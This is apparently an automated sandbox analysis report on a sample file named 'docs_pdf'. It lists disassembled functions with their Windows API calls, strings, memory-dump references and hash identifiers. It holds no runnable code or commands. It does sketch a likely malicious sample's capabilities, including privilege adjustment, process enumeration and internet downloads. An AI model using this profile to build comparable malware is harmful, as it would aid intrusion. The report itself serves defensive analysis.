                                    • Opcode Fuzzy Hash: dc8ae5f8b8709b277860ad7501d5df94393b5b153ef5c1dd45cd6d9895834b97
                                    • Instruction Fuzzy Hash: 9611C1317006126FE7212F2BEC44A6FBBDDEF89721F004429F986D7251CB79D901EAA5
                                    Function 0101C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0101C69D
                                    • CoCreateInstance.OLE32(01042D6C,00000000,00000001,01042BDC,?), ref: 0101C6B5
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • CoUninitialize.OLE32 ref: 0101C922
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                    • String ID: .lnk
                                    • API String ID: 2683427295-24824748
                                    • Opcode ID: aca788152bc439c467143c4a313348513f039f01971d119fe81432d9d5acc26c
                                    • Instruction ID: c8f937c203348c769467d09f1254e3cfa2fd259c39cec2238e6f9c9ec3c1c7b1
                                    • Opcode Fuzzy Hash: aca788152bc439c467143c4a313348513f039f01971d119fe81432d9d5acc26c
                                    • Instruction Fuzzy Hash: FEA13B71108205AFD300EF65CC81EABB7ECEF95704F04495CF2969B1A1DBB5EA49CB92
                                    Function 0102C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FF1D88,?), ref: 0102C312
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0102C324
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: b0a56f9500466e59b059daf9c4e3c22b17c30355a2c2f485043ef9eda9d29df0
                                    • Instruction ID: 5384ca34b125f9c146051f257b62fe73254d541298af24c1a6c6118ccfd252d3
                                    • Opcode Fuzzy Hash: b0a56f9500466e59b059daf9c4e3c22b17c30355a2c2f485043ef9eda9d29df0
                                    • Instruction Fuzzy Hash: CEE0C2B0A00323CFEB304F2ED414A4A7ADCEF09204B80C86EE8C5C6210E774D840CBA1
                                    Function 00FC3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: 99893e033ba9bc57d6306bb2df8221c9bda8627411aa52d47a2fb755a6ff4ce3
                                    • Instruction ID: 723f0765ba54f69ab18113be5281c898be9105ab2c3437437c5a4426c0af97d6
                                    • Opcode Fuzzy Hash: 99893e033ba9bc57d6306bb2df8221c9bda8627411aa52d47a2fb755a6ff4ce3
                                    • Instruction Fuzzy Hash: 7722BC716083029FC724EF24C982FAFB7E5AF84710F14891DF58697291DB75EA04EB92
                                    Function 0102F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0102F151
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0102F15F
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0102F21F
                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0102F22E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                    • String ID:
                                    • API String ID: 2576544623-0
                                    • Opcode ID: 72717d1e7fd720f3f2dbc7e3256cebecaabe2c532377606732bd278a76fa1119
                                    • Instruction ID: e98b60016294166f2bf1487a6be6196dddd30ebaa512b4e9d588a1408701a5d8
                                    • Opcode Fuzzy Hash: 72717d1e7fd720f3f2dbc7e3256cebecaabe2c532377606732bd278a76fa1119
                                    • Instruction Fuzzy Hash: 93519C71508311AFD320EF25DC81EABBBECEF85750F10491DF59597291EB74A908CB92
                                    Function 0100EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0100EB19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 90c38acdb2673f49c70b344e7eefb237245ae05b75980062111930c8d845c321
                                    • Instruction ID: 2fb3dc13b2fb4769089b54673f19b2e1a9e722b70a87bc573445516254d357ce
                                    • Opcode Fuzzy Hash: 90c38acdb2673f49c70b344e7eefb237245ae05b75980062111930c8d845c321
                                    • Instruction Fuzzy Hash: 15323675A006059FE729CF19C480A6AB7F1FF48310F15C9AEE59ADB3A1DB70E941CB40
                                    Function 010225E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 010226D5
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0102270C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: 676aca489973dce0583dab846d74e7de92226458de6b6739a70b3d9350c597ea
                                    • Instruction ID: 8a00c22d9d4ebd53e5f2484d469bafa44855f06ea7e1e31d6fc09e2f71ef6f05
                                    • Opcode Fuzzy Hash: 676aca489973dce0583dab846d74e7de92226458de6b6739a70b3d9350c597ea
                                    • Instruction Fuzzy Hash: 0441E772504219BFEB21DED8DC89EBFB7FCFB44714F00409AF681A6240DB719E419650
                                    Function 0101B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101B5AE
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0101B608
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0101B655
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: bfd49932f0c7bbbced9331e710cef0646d7f87db5ed381fa52fca0cf5213f2b8
                                    • Instruction ID: add7695b3addacc9bfd52b2e4700287116149dcedbf4e0eeca879c01450751e0
                                    • Opcode Fuzzy Hash: bfd49932f0c7bbbced9331e710cef0646d7f87db5ed381fa52fca0cf5213f2b8
                                    • Instruction Fuzzy Hash: F5214A75A00118EFCB00EFA5D880AEDBBB8FF49310F0480A9E945AB355DB39A915DF51
                                    Function 01008CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01008D0D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01008D3A
                                    • GetLastError.KERNEL32 ref: 01008D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: f48de40d1888dd160efba4c6c9091df956c3c01828ce274681b2f384498f7dd8
                                    • Instruction ID: 3ae808479de6faad1904e4a62d26a626bd99fc6fadacc129f6214576ba291529
                                    • Opcode Fuzzy Hash: f48de40d1888dd160efba4c6c9091df956c3c01828ce274681b2f384498f7dd8
                                    • Instruction Fuzzy Hash: EE1182B1914209AFE728AF58EC85D6BBBFDFB44710B24C62FF49593241DB35A8408B60
                                    Function 01014021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0101404B
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 01014088
                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 01014091
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: bbffa8d2aa90a9a7335d3aa54ad6e3e2102b1d344eb2192a55a508f5aff18705
                                    • Instruction ID: 504003c04301ad50ff8e00fe0f8e21a1900af98194f2a63421ec9681d90efe97
                                    • Opcode Fuzzy Hash: bbffa8d2aa90a9a7335d3aa54ad6e3e2102b1d344eb2192a55a508f5aff18705
                                    • Instruction Fuzzy Hash: F811CEB1D00229BEE7219AEDDC04FBFBBBCEB09710F000656BA44E7191C3B8590487A1
                                    Function 01014C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01014C2C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 01014C43
                                    • FreeSid.ADVAPI32(?), ref: 01014C53
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 96c47708eb1fa5443ab5a6137a9148b0b8c9712000c1f80f9a04d0e17a62561d
                                    • Instruction ID: 9758cf3e2e410348789ea9ea766440b2e93fb8c5fc9fc3d4f7b91b713e0704bf
                                    • Opcode Fuzzy Hash: 96c47708eb1fa5443ab5a6137a9148b0b8c9712000c1f80f9a04d0e17a62561d
                                    • Instruction Fuzzy Hash: C3F04975E1130DBFDF04DFF4D989AAEBBBCEF08201F0044A9AA05E2180E7756A048B51
                                    Function 00FBE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2f8c967843fbe1518ea526aa98034081a3594d085ad59f6e9e356f6958749147
                                    • Instruction ID: 72cfdc2e0234addd5a5a0a6ce3f7558ca3640728b29f5c09f853e24984fe4d87
                                    • Opcode Fuzzy Hash: 2f8c967843fbe1518ea526aa98034081a3594d085ad59f6e9e356f6958749147
                                    • Instruction Fuzzy Hash: D9228C75E00219DFCB24DF59C880AEABBF1FF04310F288169E956AB351D734A985EF91
                                    Function 01014F21 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 01014F55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID: DOWN
                                    • API String ID: 2434400541-711622031
                                    • Opcode ID: 4b2d2f2fce24b75143d492cfb1f4d0553fcf3b012ec70e075d7550327a59d730
                                    • Instruction ID: e125e4c74cdbd37bac0b6fd6c5576df3df1cdb0310279ba15b66b71958a73c4d
                                    • Opcode Fuzzy Hash: 4b2d2f2fce24b75143d492cfb1f4d0553fcf3b012ec70e075d7550327a59d730
                                    • Instruction Fuzzy Hash: 1DE0863155D77238B95424197C0AEB7138D8B12271B14028BF990D92D5DE99188655A9
                                    Function 0101C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0101C966
                                    • FindClose.KERNEL32(00000000), ref: 0101C996
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: d323b846882291b2c677b6157ca6c688f6a6a10fc2844a7cbded9bbb23f59c6f
                                    • Instruction ID: b15b13e172cfbf01a66e050ed4dfce693cd47b31acf52e5049a8521501673c56
                                    • Opcode Fuzzy Hash: d323b846882291b2c677b6157ca6c688f6a6a10fc2844a7cbded9bbb23f59c6f
                                    • Instruction Fuzzy Hash: 4D11A1326042019FDB10EF29D848A6AF7E9FF85324F00851EF9A9D7291DB78AC00CF81
                                    Function 0101A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0102977D,?,0103FB84,?), ref: 0101A302
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0102977D,?,0103FB84,?), ref: 0101A314
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 7316fdb836ccda3c6131833f975867e1bd55f41f265bd905cd577a5e78842f7a
                                    • Instruction ID: 61a9dee7d35606c937775fbb9c4d72b78c88d1ca84ffce1f2371800dfa89bf63
                                    • Opcode Fuzzy Hash: 7316fdb836ccda3c6131833f975867e1bd55f41f265bd905cd577a5e78842f7a
                                    • Instruction Fuzzy Hash: 56F0E23160522DEBDB20AEA5CC48FEA736CBF08361F008155F848D3181D6749900CBE1
                                    Function 01008713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01008851), ref: 01008728
                                    • CloseHandle.KERNEL32(?,?,01008851), ref: 0100873A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 3731b98cd60e270563fcf4dc2434abcd8374c62839ff9f21dab785bb612942b8
                                    • Instruction ID: c556581dfd3e7b99a5c8d2932047a91d61c72dc4172db948db4de9e1506fd31f
                                    • Opcode Fuzzy Hash: 3731b98cd60e270563fcf4dc2434abcd8374c62839ff9f21dab785bb612942b8
                                    • Instruction Fuzzy Hash: 44E0B676410611EFE7363B64FD09D77BBEEFB04350B14882AF59A80474DB66AC90EB10
                                    Function 00FDA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FD8F97,?,?,?,00000001), ref: 00FDA39A
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FDA3A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 6ee60dc78479c66fb31e9d67486c6114509427a938d23cf4a4ddec0e828a614b
                                    • Instruction ID: 910a67c1ed4702fdc1299d7f7fb85715af691eeba3571fe2a02daa7a4a5aa02b
                                    • Opcode Fuzzy Hash: 6ee60dc78479c66fb31e9d67486c6114509427a938d23cf4a4ddec0e828a614b
                                    • Instruction Fuzzy Hash: 2FB0923145420AABCA102B91E809B8A3F6CEB45AA2F408010F64D85054CBE754508B92
                                    Function 00FDF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5faa9d4f6fcef598726002b9f50658c617e4daa119ba608f1b0524c8ed027731
                                    • Instruction ID: 421395ad895e72d20ddf01799920ed03dfb9dd48855c1588fbce2a09c428b81e
                                    • Opcode Fuzzy Hash: 5faa9d4f6fcef598726002b9f50658c617e4daa119ba608f1b0524c8ed027731
                                    • Instruction Fuzzy Hash: 85325676D29F014ED7239534D972335B249AFB73D4F18DB37E81AB5A9AEB29C4831200
                                    Function 00FE267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
